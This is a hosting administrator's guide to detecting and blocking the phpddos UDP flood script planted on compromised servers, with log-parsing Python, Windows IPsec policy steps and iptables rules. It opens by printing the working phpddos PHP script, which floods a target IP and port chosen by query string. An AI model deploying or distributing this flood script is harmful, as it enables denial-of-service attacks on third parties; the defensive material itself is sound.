There are four security policies in total for stopping a server from sending packets out. Normally the first one is enough; note that some of the policies will cut off the server's intranet and Internet access!
First, let's look at the packet-sending code of phpddos.
<?php
$packets = 0;
$ip = $_GET['ip'];        // target address, taken straight from the query string
$rand = $_GET['port'];    // target UDP port
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time']; // how many seconds to keep sending
$time = time();
print "Flooded: $ip on port $rand\n";
$max_time = $time + $exec_time;
$out = '';
for ($i = 0; $i < 65535; $i++) {
    $out .= "X";           // 64 KB payload of filler
}
while (1) {
    $packets++;
    if (time() > $max_time) {
        break;
    }
    $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
    if ($fp) {
        fwrite($fp, $out);
        fclose($fp);
    }
}
// the scraped source had the timestamp call garbled as time(h:i:s'); date('h:i:s') is the intended call
echo "Packet complete at " . date('h:i:s') . "\n$packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging "
    . round($packets / $exec_time, 2) . " packets/s\n";
?>
Characteristics
With IIS running, the server's outbound bandwidth is exhausted: the server is the one continuously sending packets to other hosts. This is the opposite of being the victim of a DDoS attack, where the server continuously receives a large number of packets.
Recently this has hit a large number of servers because of the DEDECMS vulnerability.
How do you quickly find the sites that host the script?
Open the HTTP API error log under
C:/Windows/System32/LogFiles/HTTPERR/httperr... log (open today's file).
It will contain records like this one:
06:37:28 58.20.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
Look at the last three fields: 783 Disabled 30_FreeHost_1
783 is the site ID in IIS
30_FreeHost_1 is the application pool
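To triage a day's HTTPERR log for such entries and group them by site ID and application pool, here is an added Python example (not from the original post). The field order and the host/ip, port and time query parameters are taken from the log entry above; the two extra sample records are constructed.

```python
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Tail of an IIS HTTPERR record (W3C format): ... cs-method cs-uri sc-status s-siteid s-reason s-queuename.
# Parsing from the end keeps this tolerant of a missing leading date column, as in the entry above.
TAIL = ("method", "uri", "status", "site_id", "reason", "queue")

# $_GET parameters the flood script reads; the logged request spells the target parameter "host".
FLOOD_PARAMS = ({"ip", "port", "time"}, {"host", "port", "time"})

def parse_httperr_line(line):
    """Return the trailing fields of one HTTPERR record as a dict, or None for comments/short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(TAIL):
        return None
    return dict(zip(TAIL, parts[-len(TAIL):]))

def looks_like_flood_request(uri):
    """True when the request hits a .php script with the ip/host + port + time query trio."""
    split = urlsplit(uri)
    if not split.path.lower().endswith(".php"):
        return False
    keys = {k.lower() for k in parse_qs(split.query)}
    return any(wanted <= keys for wanted in FLOOD_PARAMS)

def find_flood_sites(lines):
    """Count suspected flood-script requests per (site ID, application pool)."""
    hits = Counter()
    for line in lines:
        rec = parse_httperr_line(line)
        if rec and rec["method"] == "GET" and looks_like_flood_request(rec["uri"]):
            hits[(rec["site_id"], rec["queue"])] += 1
    return hits

# First record is the entry quoted above; the other two are constructed for illustration.
SAMPLE_LOG = """#Fields: time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
06:37:28 58.20.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
06:37:29 58.20.112.112 26818 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?ip=122.224.32.100&port=53&time=120 503 783 Disabled 30_FreeHost_1
06:38:01 10.0.0.5 40000 98.126.247.13 80 HTTP/1.1 GET /index.php?page=2 503 12 Disabled 31_Other
"""

if __name__ == "__main__":
    for (site_id, pool), count in find_flood_sites(SAMPLE_LOG.splitlines()).most_common():
        print(f"site {site_id} pool {pool}: {count} suspected flood requests")
```

Point it at the real file with `find_flood_sites(open(path, encoding="utf-8", errors="replace"))`; the site ID and pool with the highest count is the site to inspect.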
Usage:
Reference steps
Choose Start > Administrative Tools > Local Security Policy > IP Security Policies
From the "Action" menu choose "Import Policies"
Import the "external host management platform IPset" policy file
Import the policy and assign it. You can also edit it to add ports you want to block.
The four policies in the set:
1. External VM management platform IP policy 4.1 - the one to use normally.
2. Do not use unless attacked - disable all UDP ports and disable DNS 2.0 - use while a phpddos flood is under way; it stops some attacks.
3. Do not use unless attacked - disable all UDP ports, disable DNS and block outbound port 80 (external collection) - use while a phpddos flood is under way; it stops some attacks.
4. Do not use unless attacked - block external collection on port 80 only - use only when many users are scraping external sites and bandwidth suffers.
Note: if assigning the policy fails with an error like "the service could not be started", start the IPSEC Services service in Services first.
For Linux users the method above obviously does not apply, so here is the Linux way of preventing it.
Use iptables to stop php-ddos from sending packets out
1. Allow the ports that need UDP (for example DNS):
iptables -I OUTPUT -p udp --dport 53 -d 8.8.8.8 -j ACCEPT
2. Block every other UDP packet leaving the machine:
iptables -A OUTPUT -p udp -j DROP
Here "53" is the UDP port used by DNS and "8.8.8.8" is the DNS server address; substitute whatever your server is configured to use. If you do not know which DNS server your server uses, run the following command over SSH to find out:
cat /etc/resolv.conf | grep nameserver | awk 'NR==1 {print $2}'